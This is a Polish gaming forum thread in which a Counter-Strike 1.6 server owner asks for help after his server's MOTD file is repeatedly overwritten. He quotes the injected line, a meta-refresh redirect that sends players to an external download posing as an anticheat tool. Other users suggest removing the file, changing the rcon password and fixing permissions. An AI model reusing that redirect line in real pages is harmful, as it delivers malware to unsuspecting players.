Skocz do zawartości

  • Zaloguj korzystając z Facebooka Zaloguj korzystając z Twittera Zaloguj przez Steam Zaloguj poprzez Google      Logowanie »   
  • Rejestracja

Witamy w Nieoficjalnym polskim support'cie AMX Mod X

Witamy w Nieoficjalnym polskim support'cie AMX Mod X, jak w większości społeczności internetowych musisz się zarejestrować aby móc odpowiadać lub zakładać nowe tematy, ale nie bój się to jest prosty proces w którym wymagamy minimalnych informacji.

  • Rozpoczynaj nowe tematy i odpowiedaj na inne
  • Zapisz się do tematów i for, aby otrzymywać automatyczne uaktualnienia
  • Dodawaj wydarzenia do kalendarza społecznościowego
  • Stwórz swój własny profil i zdobywaj nowych znajomych
  • Zdobywaj nowe doświadczenia

Dołączona grafika Dołączona grafika

Guest Message by DevFuse
 

Zdjęcie

Straszne lagi ,od "syfu" z serwera???


  • Nie możesz napisać tematu
  • Zaloguj się, aby dodać odpowiedź
8 odpowiedzi w tym temacie

#1 CoolBoy5878

    Banned

  • Zbanowany

Reputacja: 0
zer0.

  • Postów:19
  • Lokalizacja:Kalisz
Offline

Napisano 01.12.2012 16:10

Witam.
Mam ogromny problem z Counter-Strike .
Od trzech dni coś strasznie laguje mi gre na obojętnie jakim serwerze. Z początku myślałem ,że to przejściowe problemy z netem ,lecz jestem pewien że to nie wina internetu.
Owszem mój net nie jest najlepszy do gier typu CS ale przed tą "awarią lagów" normalnie dało się grać. Ping w grze był w granicach ~60 - 95ms. Teraz po wejściu na serwer nie da się grać , na netgraph widać jak ścina "przesył"(laguje te paski co idą się ścinają) i ping skacze od 90 do 200 ,jak gram to widzę pokaz slajdów. Dodam że ustawienia cl_rate itp nic nie dają (to nie od tego) . Mam podejrzenie że to od jakiegoś pliku "syfu" tak mnie laguje.

WAŻNE INFORMACJE:

1. Na moim serwerze pomimo wielokrotnej próby zmiany wpisu na standardowy w pliku "motd" ciągle zmienia mi na taki oto wpis -
" <meta http-equiv=Refresh content="0; url=http://www.ex.ua/load/198675373047/39630145"> "
2.Po wejściu na serwer minimalizuje mi cs,a i wyskakuje okienko "ucp-anticheat " adres -ex.ua SCREEN poniżej -

http://img593.images...beztytuucnh.png
http://imageshack.us...eztytuucnh.png/

Jak to naprawić żeby usunąć ten plik a co za tym idzie lagi???
Myślę że reinstall STEAMA nic nie pomoże ,ponieważ i tak się zasyfi tym plikiem z mojego serwera.
Jak usunąć ten syf???

Bardzo proszę o odpowiedź.

#2 CoolBoy5878

    Banned

  • Autor tematu
  • Zbanowany

Reputacja: 0
zer0.

  • Postów:19
  • Lokalizacja:Kalisz
Offline

Napisano 04.12.2012 16:56

Jestem pewien ,że to od tego -
http://img593.images...beztytuucnh.png

Każdemu po wejściu na serwer się to chce pobierać ,wiecie jak to znaleźć na ftp serwera i usunąć ????

#3 CheQ

    Nie wiem, nie znam się, nie orientuję się, zarobiony jestem.

  • Junior Admin

Reputacja: 1984
Godlike

  • Postów:5534
  • Imię:Adaś
  • Lokalizacja:Glinianka
Offline

Napisano 04.12.2012 17:03

Usuń modt z serwera.
  • +
  • -
  • 1

b_560_95_1.png


#4 Rodzyn

    Wszechwiedzący

  • Power User

Reputacja: 140
Zaawansowany

  • Postów:560
  • GG:
  • Imię:Dawid
  • Lokalizacja:Bielawa
Offline

Napisano 05.12.2012 07:15

Tak jak CheQ powiedział usuń/podmień motd.
A przybliżę ci co się stało:
1. Koleś wbija na serwer
2. wpisuje rcon_password
3. jakimś cudem zgaduje hasło
4. wpisuje kilka komend (nie podam jakich) dzięki któremu udaje podmienić MOTD
5. zmiana mapy/restart
6. Nowy motd zrobiony przez "idiote"

Wniosek: - zmienić hasło rcon'a. Najlepiej raz na jakiś czas zmieniać
  • +
  • -
  • 1

#5 CheQ

    Nie wiem, nie znam się, nie orientuję się, zarobiony jestem.

  • Junior Admin

Reputacja: 1984
Godlike

  • Postów:5534
  • Imię:Adaś
  • Lokalizacja:Glinianka
Offline

Napisano 05.12.2012 10:40

Automatyczna wiadomość


Ten temat został przeniesiony z forum

Counter-Strike 1.6Problemy

do

HLDSProblemy
  • +
  • -
  • 1

b_560_95_1.png


#6 thomas

    Banned

  • Zbanowany

Reputacja: 55
Pomocny

  • Postów:265
  • Imię:Tomasz
  • Lokalizacja:Małopolska
Offline

Napisano 05.12.2012 13:11

Miałem ten sam problem że przy wchodzeniu na serwer wychodziło okienko pobierania i hosting mi zaktualizował serwer do buildu 5758. I znikły te problemy, nie wiem czy coś ci to pomoże ale napisałem :)
Dołączona grafika
Dołączona grafika
Dołączona grafika
Dołączona grafika

#7 CoolBoy5878

    Banned

  • Autor tematu
  • Zbanowany

Reputacja: 0
zer0.

  • Postów:19
  • Lokalizacja:Kalisz
Offline

Napisano 07.12.2012 18:07

Dawno nie tu nie wchodziłem ,na szczęście sam doszedłem wreszcie jak to rozwiązać ,
CheQ miał rację :D


Ale i tak dzięki za wszystkie odpowiedzi ,+ lecą

A mam jeszcze pytanie,czy można coś zrobić żebym mógł normalnie mieć ten plik motd/.txt na serwerze bo chciałbym wgrać tam kod na moje forum .
Jak wgram motd.txt i zamieniam wpis to i tak samo się zmienia na tą stronę ruską czy jakąś i mi to okienko wyskakuje

Użytkownik CoolBoy5878 edytował ten post 07.12.2012 18:13


#8 CheQ

    Nie wiem, nie znam się, nie orientuję się, zarobiony jestem.

  • Junior Admin

Reputacja: 1984
Godlike

  • Postów:5534
  • Imię:Adaś
  • Lokalizacja:Glinianka
Offline

Napisano 07.12.2012 18:15

Ustaw Chmody odpowiednio. 755 bodajże :&
  • +
  • -
  • 0

b_560_95_1.png


#9 CoolBoy5878

    Banned

  • Autor tematu
  • Zbanowany

Reputacja: 0
zer0.

  • Postów:19
  • Lokalizacja:Kalisz
Offline

Napisano 08.12.2012 10:45

Ok spróbuje z tymi chmodami.
PS:
Jak to możliwe ,że sam się utworzył plik motd.txt a w nim znowu jakiś inny wpis i kolejne okienko po wejściu na serwer "adminka.com" czy jakoś tak .Jak odnaleźć źródło tego syfu który to wszystko tworzy i zmienia ?? Hasło RCON już zmieniłem //

Edit~~ przy próbie zmiany chmodów wyskakuje komunikat "Nie mogę zmienić atrybutów zdalnych plików"
Klikam na plik motd.txt (zaznaczam go) daje "pliki" ---> "zmień atrybuty" ---> i nie da się zmienić z 644 na 755 .
???

Użytkownik CoolBoy5878 edytował ten post 08.12.2012 10:51





Użytkownicy przeglądający ten temat: 0

0 użytkowników, 0 gości, 0 anonimowych